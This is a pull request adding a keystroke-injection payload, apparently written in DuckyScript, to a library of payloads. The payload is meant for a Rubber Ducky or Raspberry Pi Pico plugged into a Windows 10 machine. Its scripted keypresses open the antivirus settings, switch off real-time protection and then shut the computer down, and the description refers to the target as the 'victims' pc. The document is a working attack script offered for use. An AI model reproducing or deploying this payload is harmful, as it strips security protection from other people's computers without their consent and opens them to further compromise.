### PR TITLE
Disables antivirus

### DIFF
--- a/payloads/library/general/Disable Antivirus (Win 10)/payload.txt
+++ b/payloads/library/general/Disable Antivirus (Win 10)/payload.txt
@@ -1,0 +1,40 @@
+REM Title: Disable Windows 10 Antivirus
+REM Author: ZachQ
+REM Description: Disables antivirus and after that shuts down the computer
+REM Target: Windows 10 (User Interface)
+REM Version: 1.1
+
+
+DELAY 1000 
+GUI 
+DELAY 1000 
+STRING ant 
+DELAY 1000 
+ENTER 
+DELAY 2000 
+TAB 
+TAB 
+TAB 
+TAB 
+ENTER 
+DELAY 2000 
+SPACEBAR 
+DELAY 1000 
+LEFTARROW
+DELAY 800 
+ENTER 
+DELAY 2000 
+ALT F4
+DELAY 500
+GUI
+DELAY 500
+TAB
+DOWNARROW
+DOWNARROW
+DOWNARROW
+DOWNARROW
+DOWNARROW
+ENTER
+DELAY 300
+DOWNARROW
+ENTER


### PR DESCRIPTION
Adding my payload to the general category (version 1.1).

This payload is designed to disable real time protection antivirus on win 10 and shut down the computer.

Just put the payload.txt file to your rasberry pi pico or rubber ducky.

Only requirement is the user profile in the "victims" pc to  has administrator privileges.